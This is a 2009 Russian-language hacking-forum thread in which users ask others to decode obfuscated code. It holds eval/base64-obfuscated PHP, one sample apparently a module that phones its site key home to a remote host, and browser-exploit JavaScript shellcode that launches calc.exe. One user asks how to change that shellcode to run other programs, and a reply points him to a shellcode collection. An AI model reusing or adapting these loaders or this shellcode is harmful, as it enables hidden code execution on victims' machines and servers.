25.11.2009, 13:13
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами:
9537021
Репутация:
-5
|
|
Помогите.
PHP код:
<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) {
function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B9B9F958D906208506E)
{
$TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E);
$T7FC56270E7A70FA81A5935B72EACBE29 = 0;
$T9D5ED678FE57BCCA610140957AFAB571 = 0;
$T0D61F8370CAD1D412F80B84D143E1257 = 0;
$TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]);
$T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3;
$T800618943025315F869E4E1F09471012 = 0;
$TDFCF28D0734569A6A693BC8194DE62BF = 16;
$TC1D9F50F86825A1A2302EC2449C17196 = "";
$TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E);
$TFF44570ACA8241914870AFBC310CDB85 = __FILE__;
$TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB85);
$TA5F3C6A11B03839D46AF9FB43C97C188 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188);
for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA < $TDD7536794B63BF90ECCFD37F9B147D7F;) {
if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit;
if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) {
$TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);
$TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]);
$TDFCF28D0734569A6A693BC8194DE62BF = 16;
}
if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 &0x8000) {
$T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4);
$T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4);
if ($T7FC56270E7A70FA81A5935B72EACBE29) {
$T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) &0x0F) + 3;
for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 + $T0D61F8370CAD1D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 - $T7FC56270E7A70FA81A5935B72EACBE29 + $T0D61F8370CAD1D412F80B84D143E1257];
$T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;
} else {
$T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);
$T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16;
for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012 + $T0D61F8370CAD1D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]);
$T3A3EA00CFC35332CEDF6E5E9A32E94DA++;
$T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;
}
} else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++];
$TF623E75AF30E62BBD73D6DF5B50BB7B5 << = 1;
$TDFCF28D0734569A6A693BC8194DE62BF--;
if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) {
$TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196);
$TFF44570ACA8241914870AFBC310CDB85 = "?" . ">" . $TFF44570ACA8241914870AFBC310CDB85 . "<" . "?";
return $TFF44570ACA8241914870AFBC310CDB85;
}
}
}
}
eval(T7FC56270E7A70FA81A5935B72EACBE29("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"));
?>
|
|
|
26.11.2009, 00:03
|
|
Постоянный
Регистрация: 14.04.2008
Сообщений: 327
С нами:
9512608
Репутация:
69
|
|
Каким образом обфусцировать код на AS, желатьтельно онлайн обфускатор нехочется самомому переводить.
|
|
|
|
28.11.2009, 09:21
|
|
Познающий
Регистрация: 06.12.2008
Сообщений: 30
С нами:
9173681
Репутация:
0
|
|
помогите расшифровать )
PHP код:
<?php
$V254778035="5rautq+ooKnu7/3m";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNlRrUlZNMDU2UlRCT2VrazVXVzFHZWxwVVdUQllNbEpzV1RJNWExcFRaMmxYVnpGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVWGhOVkZWNVRsUlJkMDVFTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMHhTalZaYTJSWFpGTkpjRTk1VWxkT2VrazBUbnBuZWs1cVZUUlFWMHBvWXpKVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozaE5SRlYzVFVSamVFNXFNV2xaV0U1c1RtcFNabHBIVm1waU1sSnNTME5LYVUwd2NISkphV3MzU2taWk5VNUVTVEJPZWxFd1RsUm5PVmx0Um5wYVZGa3dXREpTYkZreU9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNVRsUlJNMDU2WjNkTmVsVTVTa1paZWs1RVZUTk9la1V3VG5wSmIwcEdXWGxPVkZFelRucG5kMDE2VlhCUGVWSlhUbFJyTWs1NmF6UlBWRkY1VUZOU1YwNUVSWGhPVkVreFRrUkJNRXREVWxkTmFsVXdUbnBqTkUxRVRURkxWSE05SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKRll4TkRRek16STVOelU5SnljN1ptOXlLQ1JXTmpBME9UWXpPRFl6UFRBN0pGWTJNRFE1TmpNNE5qTThKRlkxT1RZM09UZzVOREk3SkZZMk1EUTVOak00TmpNckt5bDdKRll4TkRRek16STVOelV1UFNSV056STROemd6TmpVNEtDZ2tWamd4TURVd01EY3hOaWdrVmpJMU5EYzNPREF6TlZza1ZqWXdORGsyTXpnMk0xMHBYakUwTkRrME9UZzFOallwS1R0OVpYWmhiQ2drVmpFME5ETXpNamszTlNrNyIpKTs="));
?>
|
|
|
|
28.11.2009, 13:34
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами:
9851426
Репутация:
1676
|
|
|
|
|
|
28.11.2009, 15:48
|
|
Новичок
Регистрация: 04.12.2006
Сообщений: 7
С нами:
10228396
Репутация:
0
|
|
нужна помощь в расшифровке, помогите кто может.
есть код типа:
Код:
//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//
пытаюсь вывести на экран document.write (), но получаю иероглифы.
нашел конвертер UCS2 to HEX, результат радужнее предыдущего:
Код:
FCE8 4400 0000 8B45 3C8B 7C05 7801 EF8B 4F18 8B5F 2001 EB49 8B34 8B01 EE31 C099 AC84 C074 07C1 CA0D 01C2 EBF4 3B54 2404 75E5 8B5F 2401 EB66 8B0C 4B8B 5F1C 01EB 8B1C 8B01 EB89 5C24 04C3 31C0 648B 4030 85C0 780C 8B40 0C8B 701C AD8B 6808 EB09 8B80 B000 0000 8B68 3C5F 31F6 6056 89F8 83C0 7B50 687E D8E2 7368 98FE 8A0E 57FF E763 616C 6300
но хотелось бы привести к более читаемому результату. Объясните пожалуйста как это сделать!
Заранее благодарю!)
ps вообще, объясните, что делает данный код? то что он запускает calc.exe, я знаю. хочу знать как он это делает и как можно его изменить чтоб, например, он запускал блокнот))
Последний раз редактировалось anticoder; 28.11.2009 в 15:57..
|
|
|
|
28.11.2009, 17:31
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами:
10016425
Репутация:
1257
|
|
anticoder, имя переменной "Shellcode" кагбэ намекает, что там записан байт-код, который исполняется уязвимым браузером при переполнении буффера. Так что твой HEX код ты можешь записать файл и открыть в любом дизасемблере.
а вот тебе немного шеллкодов: http://www.shell-storm.org/shellcode/
|
|
|
|
30.11.2009, 22:33
|
|
Новичок
Регистрация: 04.12.2006
Сообщений: 7
С нами:
10228396
Репутация:
0
|
|
Сообщение от mr.The
anticoder, имя переменной "Shellcode" кагбэ намекает, что там записан байт-код, который исполняется уязвимым браузером при переполнении буффера. Так что твой HEX код ты можешь записать файл и открыть в любом дизасемблере.
а вот тебе немного шеллкодов: http://www.shell-storm.org/shellcode/
Спасибо, что направление задал! То что нужно))
|
|
|
|
29.11.2009, 04:48
|
|
Новичок
Регистрация: 15.11.2008
Сообщений: 2
С нами:
9203185
Репутация:
0
|
|
Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html
|
|
|
|
30.11.2009, 13:47
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
С нами:
9734512
Репутация:
8
|
|
Сообщение от Wanderercom
Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html
Держи
upload_new.rar
http://www.sendspace.com/file/twf2c6
|
|
|
|
30.11.2009, 15:46
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
С нами:
9734512
Репутация:
8
|
|
кому что ещё надо? пишите
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
